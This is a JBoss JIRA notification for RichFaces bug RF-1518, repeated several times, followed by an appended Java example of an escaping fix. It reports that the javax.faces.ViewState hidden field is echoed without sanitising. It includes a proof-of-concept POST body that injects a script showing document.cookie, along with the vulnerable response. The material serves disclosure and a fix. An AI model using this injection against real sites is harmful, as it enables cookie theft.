[richfaces-issues] [JBoss JIRA] Updated: (RF-1518) hidden field javax.faces.ViewState is not sanitized
Tomoharu Fujita (JIRA)
jira-events at lists.jboss.org
Wed Dec 5 03:17:52 EST 2007
[ http://jira.jboss.com/jira/browse/RF-1518?page=all ]
Tomoharu Fujita updated RF-1518:
--------------------------------
Description:
Here is the sample facelets page in my application that produces the symptom.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:f="http://java.sun.com/jsf/core"
xmlns:h="http://java.sun.com/jsf/html"
xmlns:ui="http://java.sun.com/jsf/facelets"
xmlns:a4j="http://richfaces.org/a4j"
xmlns:rich="http://richfaces.org/rich"
xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title></title>
</head>
<body>
<f:view>
<h:form>
<rich:panel header="Simple Echo">
<h:inputText size="20" value="#{startupBean.command}" >
<a4j:support event="onkeyup" reRender="ruleTest" action="#{startupBean.doApprove}"/>
</h:inputText>
<h:outputText value="#{startupBean.result}" id="ruleTest"/>
</rich:panel>
</h:form>
</f:view>
</body>
</html>
The first time, the rendered output is like the following:
<?xml version="1.0"?>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title></title><link type="text/css" rel="stylesheet" href="/a4j_3_1_2.GAcss/panel.xcss/DATB/eAGTWzQ.BgAD.AG8.jsf" /><script type="text/javascript" src="/a4j_3_1_2.GAorg.ajax4jsf.javascript.AjaxScript.jsf">
</script></head>
<body><span id="j_id2:ruleTest">world</span><meta name="Ajax-Update-Ids" content="j_id2:ruleTest" /><span id="ajax-view-state"><input type="hidden" name="javax.faces.ViewState" id="javax.faces.ViewState" value="_id2" /></span><meta id="Ajax-Response" name="Ajax-Response" content="true" /></body>
</html>
When the javax.faces.ViewState hidden param injection is made with a POST request like the one below,
AJAXREQUEST=_viewRoot&j_id2=j_id2&j_id2%3Aj_id4=hello&javax.faces.ViewState=_id2"<script>alert(document.cookie);</script>&j_id2%3Aj_id5=j_id2%3Aj_id5&
the rendered response is:
<?xml version="1.0"?>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title></title><link type="text/css" rel="stylesheet" href="/a4j_3_1_2.GAcss/panel.xcss/DATB/eAGTWzQ.BgAD.AG8.jsf" /><script type="text/javascript" src="/a4j_3_1_2.GAorg.ajax4jsf.javascript.AjaxScript.jsf">
</script></head>
<body><span id="j_id2:ruleTest">world</span><meta name="Ajax-Update-Ids" content="j_id2:ruleTest" /><span id="ajax-view-state"><input type="hidden" name="javax.faces.ViewState" id="javax.faces.ViewState" value="_id2" /><script type="text/javascript">//<![CDATA[
alert(document.cookie);
//]]>
</script>" /></span><meta id="Ajax-Response" name="Ajax-Response" content="true" /></body></html>
I'm not sure whether it's a jsf-ri issue or a RichFaces one, but if javax.faces.STATE_SAVING_METHOD is set to client,
I couldn't reproduce the same issue.
was:
Here is the sample facelets page in my application that produces the symptom.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:f="http://java.sun.com/jsf/core"
xmlns:h="http://java.sun.com/jsf/html"
xmlns:ui="http://java.sun.com/jsf/facelets"
xmlns:a4j="http://richfaces.org/a4j"
xmlns:rich="http://richfaces.org/rich"
xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title></title>
</head>
<body>
<f:view>
<h:form>
<rich:panel header="Simple Echo">
<h:inputText size="20" value="#{startupBean.command}" >
<a4j:support event="onkeyup" reRender="ruleTest" action="#{startupBean.doApprove}"/>
</h:inputText>
<h:outputText value="#{startupBean.result}" id="ruleTest"/>
</rich:panel>
</h:form>
</f:view>
</body>
</html>
The first time, the rendered output is like the following:
<?xml version="1.0"?>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title></title><link type="text/css" rel="stylesheet" href="/a4j_3_1_2.GAcss/panel.xcss/DATB/eAGTWzQ.BgAD.AG8.jsf" /><script type="text/javascript" src="/a4j_3_1_2.GAorg.ajax4jsf.javascript.AjaxScript.jsf">
</script></head>
<body><span id="j_id2:ruleTest">world</span><meta name="Ajax-Update-Ids" content="j_id2:ruleTest" /><span id="ajax-view-state"><input type="hidden" name="javax.faces.ViewState" id="javax.faces.ViewState" value="_id2" /></span><meta id="Ajax-Response" name="Ajax-Response" content="true" /></body>
</html>
When the javax.faces.ViewState hidden param injection is made with a POST request like this,
AJAXREQUEST=_viewRoot&j_id2=j_id2&j_id2%3Aj_id4=hello&javax.faces.ViewState=_id2"<script>alert(document.cookie);</script>&j_id2%3Aj_id5=j_id2%3Aj_id5&
the rendered response is:
<?xml version="1.0"?>
<html xmlns="http://www.w3.org/1999/xhtml"><head><title></title>
<link type="text/css" rel="stylesheet" href="/a4j_3_1_2.GAcss/panel.xcss/DATB/eAGTWzQ.BgAD.AG8.jsf" />
<script type="text/javascript" src="/a4j_3_1_2.GAorg.ajax4jsf.javascript.AjaxScript.jsf">
</script>
</head>
<body><span id="j_id2:ruleTest">world</span><meta name="Ajax-Update-Ids" content="j_id2:ruleTest" /><span id="ajax-view-state"><input type="hidden" name="javax.faces.ViewState" id="javax.faces.ViewState" value="_id2" /><script type="text/javascript">//<![CDATA[
alert(document.cookie);
//]]>
</script>" /></span><meta id="Ajax-Response" name="Ajax-Response" content="true" /></body></html>
But I'm not sure whether it's a jsf-ri issue or a RichFaces one.
> hidden field javax.faces.ViewState is not sanitized
> ---------------------------------------------------
>
> Key: RF-1518
> URL: http://jira.jboss.com/jira/browse/RF-1518
> Project: RichFaces
> Issue Type: Bug
> Affects Versions: 3.1.2
> Environment: jsf-ri 1.2_06-b02-FCS, facelets 1.1.13, RichFaces 3.1.2SP1, WindowsXP(x86_64)
> Reporter: Tomoharu Fujita
>
> Here is the sample facelets page in my application that produces the symptom.
> <?xml version="1.0" encoding="UTF-8"?>
> <!DOCTYPE html
> PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
> "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
> <html xmlns:f="http://java.sun.com/jsf/core"
> xmlns:h="http://java.sun.com/jsf/html"
> xmlns:ui="http://java.sun.com/jsf/facelets"
> xmlns:a4j="http://richfaces.org/a4j"
> xmlns:rich="http://richfaces.org/rich"
> xmlns="http://www.w3.org/1999/xhtml" >
> <head>
> <title></title>
> </head>
> <body>
> <f:view>
> <h:form>
> <rich:panel header="Simple Echo">
> <h:inputText size="20" value="#{startupBean.command}" >
> <a4j:support event="onkeyup" reRender="ruleTest" action="#{startupBean.doApprove}"/>
> </h:inputText>
> <h:outputText value="#{startupBean.result}" id="ruleTest"/>
> </rich:panel>
> </h:form>
> </f:view>
> </body>
> </html>
> The first time, the rendered output is like the following:
> <?xml version="1.0"?>
> <html xmlns="http://www.w3.org/1999/xhtml">
> <head><title></title><link type="text/css" rel="stylesheet" href="/a4j_3_1_2.GAcss/panel.xcss/DATB/eAGTWzQ.BgAD.AG8.jsf" /><script type="text/javascript" src="/a4j_3_1_2.GAorg.ajax4jsf.javascript.AjaxScript.jsf">
> </script></head>
> <body><span id="j_id2:ruleTest">world</span><meta name="Ajax-Update-Ids" content="j_id2:ruleTest" /><span id="ajax-view-state"><input type="hidden" name="javax.faces.ViewState" id="javax.faces.ViewState" value="_id2" /></span><meta id="Ajax-Response" name="Ajax-Response" content="true" /></body>
> </html>
> When the javax.faces.ViewState hidden param injection is made with a POST request like the one below,
> AJAXREQUEST=_viewRoot&j_id2=j_id2&j_id2%3Aj_id4=hello&javax.faces.ViewState=_id2"<script>alert(document.cookie);</script>&j_id2%3Aj_id5=j_id2%3Aj_id5&
> the rendered response is:
> <?xml version="1.0"?>
> <html xmlns="http://www.w3.org/1999/xhtml">
> <head><title></title><link type="text/css" rel="stylesheet" href="/a4j_3_1_2.GAcss/panel.xcss/DATB/eAGTWzQ.BgAD.AG8.jsf" /><script type="text/javascript" src="/a4j_3_1_2.GAorg.ajax4jsf.javascript.AjaxScript.jsf">
> </script></head>
> <body><span id="j_id2:ruleTest">world</span><meta name="Ajax-Update-Ids" content="j_id2:ruleTest" /><span id="ajax-view-state"><input type="hidden" name="javax.faces.ViewState" id="javax.faces.ViewState" value="_id2" /><script type="text/javascript">//<![CDATA[
> alert(document.cookie);
> //]]>
> </script>" /></span><meta id="Ajax-Response" name="Ajax-Response" content="true" /></body></html>
> I'm not sure whether it's a jsf-ri issue or a RichFaces one, but if javax.faces.STATE_SAVING_METHOD is set to client,
> I couldn't reproduce the same issue.
--
This message is automatically generated by JIRA.
-
If you think it was sent incorrectly contact one of the administrators: http://jira.jboss.com/jira/secure/Administrators.jspa
-
For more information on JIRA, see: http://www.atlassian.com/software/jira
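The defect shown in the report is the submitted javax.faces.ViewState value being written back into the value="..." attribute of the hidden input in the Ajax response without attribute escaping, so a double quote in the value closes the attribute. The following Java class is an added illustration of the fix a renderer needs; it is not RichFaces or JSF-RI code, and the class name, method names and the server-state-id pattern are assumptions made for this example (the "_id2" format is taken from the report's own output, the regex is a guess at its general shape).

```java
import java.util.regex.Pattern;

/**
 * Added example (not project code): rendering the javax.faces.ViewState
 * hidden field with and without HTML-attribute escaping.
 */
public final class ViewStateRenderer {

    /** Escapes a string for safe placement inside a double-quoted HTML attribute. */
    static String escapeAttribute(String s) {
        StringBuilder sb = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  sb.append("&amp;");  break;
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#39;");  break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    /** Unescaped rendering: the behaviour reported in RF-1518 (the value can close the attribute). */
    static String renderVulnerable(String viewState) {
        return "<input type=\"hidden\" name=\"javax.faces.ViewState\" "
             + "id=\"javax.faces.ViewState\" value=\"" + viewState + "\" />";
    }

    /** Escaped rendering: every character of the submitted value stays inside the attribute. */
    static String renderHardened(String viewState) {
        return "<input type=\"hidden\" name=\"javax.faces.ViewState\" "
             + "id=\"javax.faces.ViewState\" value=\"" + escapeAttribute(viewState) + "\" />";
    }

    /**
     * Optional second layer for server-side state saving: the state id issued by
     * the server has a known shape ("_id2" in the report), so a value that does not
     * match can be rejected before it reaches any renderer. The pattern is an
     * assumption for this example; adapt it to the state manager actually in use.
     */
    private static final Pattern SERVER_STATE_ID = Pattern.compile("_id\\d+");

    static boolean isWellFormedServerStateId(String viewState) {
        return viewState != null && SERVER_STATE_ID.matcher(viewState).matches();
    }

    public static void main(String[] args) {
        // Constructed from the POST body quoted in the report (the ViewState parameter value).
        String submitted = "_id2\"<script>alert(document.cookie);</script>";
        System.out.println("vulnerable: " + renderVulnerable(submitted));
        System.out.println("hardened:   " + renderHardened(submitted));
        System.out.println("accepted as server state id: " + isWellFormedServerStateId(submitted));
        System.out.println("accepted as server state id: " + isWellFormedServerStateId("_id2"));
    }
}
```

The escaping in renderHardened is the actual fix: it is context-specific (HTML attribute), applied at output time, and does not depend on what the state-saving method is, which is why it also covers the client-side case where the ViewState value is long, opaque data. The id-shape check is only a defence in depth for server-side state saving and must not replace the escaping.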